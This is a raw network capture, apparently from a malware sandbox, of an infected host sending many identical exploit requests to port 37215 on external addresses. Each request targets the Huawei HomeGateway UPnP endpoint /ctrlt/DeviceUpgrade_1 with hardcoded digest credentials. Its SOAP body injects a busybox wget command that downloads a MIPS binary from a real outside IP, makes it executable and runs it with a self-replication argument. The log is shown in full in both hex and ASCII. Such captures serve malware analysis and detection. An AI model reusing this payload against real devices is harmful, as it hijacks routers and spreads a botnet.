3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1730192.168.2.133483441.187.118.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618577003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1731192.168.2.1333060197.241.104.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618622065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1732192.168.2.1348358208.67.236.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618654013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1733192.168.2.1342384103.18.76.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618669987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1734192.168.2.1339312197.74.172.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618691921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1735192.168.2.1360182197.154.129.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618691921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1736192.168.2.135361241.177.198.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618694067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1737192.168.2.1356312157.26.4.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618694067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1738192.168.2.134173841.218.239.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618727922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1739192.168.2.1338652157.112.206.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618746996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1740192.168.2.134923241.143.201.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618746996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
